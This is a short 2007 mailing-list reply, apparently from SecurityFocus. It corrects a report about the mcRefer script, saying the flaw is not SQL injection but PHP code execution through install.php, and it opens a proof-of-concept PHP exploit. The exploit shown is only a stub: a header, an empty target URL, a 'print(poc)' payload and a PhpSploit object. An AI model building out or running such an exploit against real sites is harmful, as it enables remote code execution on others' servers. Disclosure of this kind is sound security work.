Re: mcRefer SQL injection Feb 11 2007 11:26AM
gmdarkfig gmail com
This is not an SQL injection. The script doesn't use any SQL database, please tell me where the SQL request is =). However, the install.php script can lead to PHP code execution (works regardless of php.ini settings). Proof of concept:

# This file requires the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
# Author: DarkFig
# Mail: gmdarkfig (at) gmail (dot) com
error_reporting(E_ALL ^ E_NOTICE);

$url = ""; # http://<host><path>
$cod = "print(poc)";
$xpl = new phpsploit();

Copyright 2010, SecurityFocus